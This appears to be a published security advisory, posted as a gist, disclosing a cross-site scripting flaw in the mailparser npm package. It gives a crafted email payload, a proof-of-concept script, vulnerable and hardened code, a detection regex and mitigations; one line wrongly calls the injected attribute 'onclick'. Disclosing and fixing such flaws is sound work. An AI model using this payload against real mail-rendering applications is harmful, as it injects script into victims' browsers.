@hayageek
Created January 28, 2026 07:04
Cross-Site Scripting (XSS) in mailparser
From: attacker@evil.com
To: victim@example.com
Subject: Working XSS Exploit
Date: Wed, 28 Jan 2026 10:00:00 +0000
Content-Type: text/plain; charset=utf-8

http://google.com?"onmouseover="alert('XSS')"
const fs = require('fs');
const {simpleParser} = require('mailparser');

let input = fs.createReadStream(__dirname + '/exploit-input.eml');

simpleParser(input, {
    skipHtmlToText: true,
    skipImageLinks: true,
    skipTextToHtml: false,
    skipTextLinks: false,
    keepDeliveryStatus: true,
    keepCidLinks: true
})
    .then(mail => {
        const vulnerableHtml = mail.textAsHtml || mail.html || '';
        // Open poc_output.html in a browser; the alert fires on mouseover of the link
        fs.writeFileSync(__dirname + '/poc_output.html', vulnerableHtml);
    })
    .catch(err => {
        console.log('Error:', err);
    });

Security Advisory: XSS Vulnerability in mailparser

Summary

Severity: 🔴 HIGH
CVSS 3.1: 8.1 (High) (base score computed from the vector below)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
CWE: CWE-79 (Cross-site Scripting)

A Cross-Site Scripting (XSS) vulnerability in mailparser allows anyone who can send an email to inject arbitrary JavaScript into the parser's textAsHtml output: when a plain-text body is converted to HTML, URLs containing double quotes are interpolated into an href attribute without encoding, so any application that renders that HTML in a browser executes the injected event handler.


Affected Versions

  • Package: mailparser (npm)
  • Affected: All versions ≤ 3.9.1
  • Status: ⚠️ Not yet fixed (as of 28 January 2026, the date of this advisory)

Vulnerability Details

Location

File: https://github.com/nodemailer/mailparser/blob/master/lib/mail-parser.js#L1132

Line: 1132 (on the master branch at the time of writing; the link is not pinned to a commit, so the line may move)
Function: textToHtml()

Vulnerable Code

result.push(`<a href="${link.url}">${link.text}</a>`);

Root Cause

textToHtml() interpolates link.url and link.text (the URLs that linkify-it finds in the plain-text body) directly into the HTML template without encoding them, even though the surrounding text is encoded. A double quote anywhere in the URL (query string, fragment or path) therefore terminates the href attribute value, and whatever follows it is parsed by the browser as additional attributes on the <a> element, which is enough to plant an event handler. This path is taken whenever a text/plain body is converted to HTML (skipTextToHtml false) and links are generated (skipTextLinks false); both are the defaults, so every consumer that renders mail.textAsHtml is exposed.

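As an added illustration of the root cause and of the Exploit Example that follows (this is example code written for this page, not mailparser's own): a minimal stand-in for textToHtml() that reproduces the raw interpolation at lib/mail-parser.js#L1132 next to a hardened variant that HTML-encodes the href value and the link text, plus a rough check that flags an event-handler attribute on the generated anchor. Assumptions: URL_RE is a simple regex standing in for linkify-it (enough to match the advisory's payload, nothing more), encodeHtml is a hand-rolled escaper, hasInjectedHandler is a heuristic rather than an HTML tokenizer, and POC_BODY is constructed from the message body in the Exploit Example.

```javascript
// Added example for this advisory, not code from mailparser. It mimics the
// shape of textToHtml(): walk the plain-text body, HTML-encode the ordinary
// text, and emit an <a> tag for each URL found.

// Assumption: a simple URL matcher is enough for the advisory's payload.
// It stands in for linkify-it, which has a much richer grammar.
const URL_RE = /https?:\/\/[^\s<>]+/g;

// Hand-rolled HTML escaper covering text content and double-quoted attributes.
function encodeHtml(str) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(str).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Returns {url, text, index, lastIndex} records, the fields the vulnerable
// template reads from each linkify-it match.
function findLinks(text) {
  return Array.from(text.matchAll(URL_RE), (m) => ({
    url: m[0],
    text: m[0],
    index: m.index,
    lastIndex: m.index + m[0].length,
  }));
}

// Shared walk: everything outside a link is encoded; how the link itself is
// rendered is the only thing that differs between the two variants below.
function textToHtml(text, makeAnchor) {
  const out = [];
  let last = 0;
  for (const link of findLinks(text)) {
    if (link.index > last) out.push(encodeHtml(text.slice(last, link.index)));
    out.push(makeAnchor(link));
    last = link.lastIndex;
  }
  if (last < text.length) out.push(encodeHtml(text.slice(last)));
  return out.join('');
}

// Vulnerable: the template from lib/mail-parser.js#L1132. A '"' inside the
// URL terminates the href value and whatever follows becomes new attributes.
const anchorVulnerable = (link) => `<a href="${link.url}">${link.text}</a>`;

// Hardened: the attribute value and the element text are encoded separately,
// so '"' becomes &quot; and can no longer close the href attribute.
const anchorSafe = (link) => `<a href="${encodeHtml(link.url)}">${encodeHtml(link.text)}</a>`;

// Rough check for an event-handler attribute on an <a> start tag. In the
// HTML tokenizer a name directly after a closing quote still starts a new
// attribute, hence the ["'\s] class rather than whitespace only. Not a
// substitute for a real parser or sanitizer.
function hasInjectedHandler(html) {
  return /<a\b[^>]*["'\s]on[a-z]+\s*=/i.test(html);
}

// Constructed message body, copied from the Exploit Example in this advisory.
const POC_BODY = 'Visit: http://google.com?"onmouseover="alert(\'XSS\')"';

function demo(body = POC_BODY) {
  const vulnerable = textToHtml(body, anchorVulnerable);
  const safe = textToHtml(body, anchorSafe);
  return {
    vulnerable,
    safe,
    vulnerableInjected: hasInjectedHandler(vulnerable),
    safeInjected: hasInjectedHandler(safe),
  };
}

const result = demo();
console.log('vulnerable:', result.vulnerable, '-> handler injected:', result.vulnerableInjected);
console.log('hardened:  ', result.safe, '-> handler injected:', result.safeInjected);
```

Running it shows the vulnerable variant emitting onmouseover as a separate attribute while the hardened variant keeps the whole payload inside the quoted href as &quot;onmouseover=&quot;... and renders benign URLs identically to the original. Until an upstream fix ships, a consuming application can pass skipTextToHtml: true (no textAsHtml is generated) or skipTextLinks: true (URLs in the text body are not turned into anchors), both options the PoC script sets explicitly, or treat mail.textAsHtml as untrusted input and run it through an HTML sanitizer before rendering.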

Attack Vector

Exploit Example

Malicious Email:

From: attacker@evil.com
To: victim@example.com
Subject: Check this out
Content-Type: text/plain

Visit: http://google.com?"onmouseover="alert('XSS')"

Generated HTML:

<a href="http://google.com?"onmouseover="alert('XSS')">http://google.com?"onmouseover="alert('XSS')</a>

The quote (") breaks out of href, injecting the onclick attribute.

Proof of Concept

Test Script

const fs = require('fs');
const {simpleParser} = require('mailparser');

// exploit-input.eml is the plain-text message shown above (Content-Type: text/plain)
let input = fs.createReadStream(__dirname + '/exploit-input.eml');

simpleParser(input, {
    skipHtmlToText: true,
    skipImageLinks: true,
    // The two options that matter: both must be false (the defaults) for
    // textToHtml() to run and to turn URLs in the text body into <a> tags
    skipTextToHtml: false,
    skipTextLinks: false,
    keepDeliveryStatus: true,
    keepCidLinks: true
})
    .then(mail => {
        // textAsHtml is the output of textToHtml(); the anchor it contains
        // carries the injected onmouseover attribute
        const vulnerableHtml = mail.textAsHtml || mail.html || '';
        // Open poc_output.html in a browser; the alert fires on mouseover of the link
        fs.writeFileSync(__dirname + '/poc_output.html', vulnerableHtml);
    })
    .catch(err => {
        console.log('Error:', err);
    });

Credits

https://github.com/hayageek/
